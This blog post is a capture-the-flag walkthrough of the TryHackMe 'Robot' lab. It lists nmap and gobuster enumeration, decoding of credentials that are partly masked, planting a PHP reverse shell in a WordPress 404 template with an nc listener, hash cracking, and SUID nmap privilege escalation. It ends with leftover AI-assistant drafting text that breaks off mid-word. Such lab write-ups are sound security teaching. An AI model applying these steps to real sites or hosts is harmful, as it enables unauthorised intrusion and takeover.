Post

Tryhackme Mr robot Walkthrough - Pentest Lab Notes

Posted Updated
By
1 min read
Tryhackme Mr robot Walkthrough - Pentest Lab Notes

πŸ€– TryHackMe: Robot Room - Walkthrough

Welcome to the walkthrough of the Robot room on TryHackMe, inspired by the Mr. Robot TV series. This lab focuses on web enumeration, WordPress exploitation, hash cracking, and privilege escalation techniques.

🧠 Room Information

  • Platform: TryHackMe
  • Room Name: Robot
  • Difficulty: Easy–Intermediate
  • Skills Covered:
    • Web Enumeration
    • WordPress Vulnerabilities
    • Password Hash Cracking
    • Shell Access
    • Privilege Escalation

πŸ” Recon & Enumeration

1
2

nmap -sC -sV -Pn <TARGET_IP>
nmap -A <TARGET_IP>

Discovered Open Ports:

1
2
3

80/tcp β€” HTTP

443/tcp β€” HTTPS

Directory Brute Forcing:

1

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Interesting Endpoints:

1
2
3
4
5

/robots.txt

/license

/wp-login.php

🚩 Flag 1 - Found in robots.txt

Accessing /robots.txt shows:

User-agent: * Disallow: /key-1-of-3.txt

Visiting that file reveals:

073403c8β€”β€”β€”β€”β€”β€”β€”

πŸ” Credential Discovery

From /license, we find a Base64-encoded string. Decoding:

echo β€˜R________________Mg==’base64 -d

Reveals credentials:

elliot:ER28β€”β€”2

πŸ’₯ WordPress Exploitation

1
2
3
4
5
6
7
8

Log into /wp-login.php using Elliot's credentials.

Go to Appearance β†’ Theme Editor.

Modify the 404.php template with a PHP reverse shell.

Start listener: ``` nc -lvnp 4444 ```
Trigger shell by visiting a nonexistent URL.

🧠 Shell Access & Enumeration

Stabilize shell:

1

python3 -c 'import pty; pty.spawn("/bin/bash")'

Found key-2-of-3.txt in /home/robot/ (not readable).

Also found password.raw-md5:

c3fcd3d76192e————–3b

Cracked using CrackStation: ➑️ Password = abcdefghijklmnopqrstuvwxyz

Switch to robot:

1

su robot

Now access:

822c73956β€”β€”β€”β€”β€”-9f959

βš™οΈ Privilege Escalation

Check for SUID files:

1

find / -perm -4000 -type f 2>/dev/null

Found: /usr/local/bin/nmap

Interactive Nmap exploit (via GTFOBins):

1
2

nmap --interactive
!sh

Now root! πŸš€ 🏁 Final Flag

1

Read /root/key-3-of-3.txt:

πŸ“š Tools & Resources Used

1
2
3
4
5
6
7
8
9

Nmap

Gobuster

CrackStation

GTFOBins

PentestMonkey PHP Shell

✍️ Author

Your nikhil

βœ… To Use:

  • Replace <TARGET_IP> with the IP of your deployed machine (or remove if not sharing actual commands).
  • Update your name and links at the bottom.
  • Save this as README.md in your GitHub repository.

Let me know if you’d like me to help format this in a GitHub repo directly, or generate an accompany

tryhackme, walkthrough
ctf enumeration exploit Mr robot writeups htb writeups tryhackme Linux wordpress cracking walkthrough
This post is licensed under CC BY 4.0 by the author.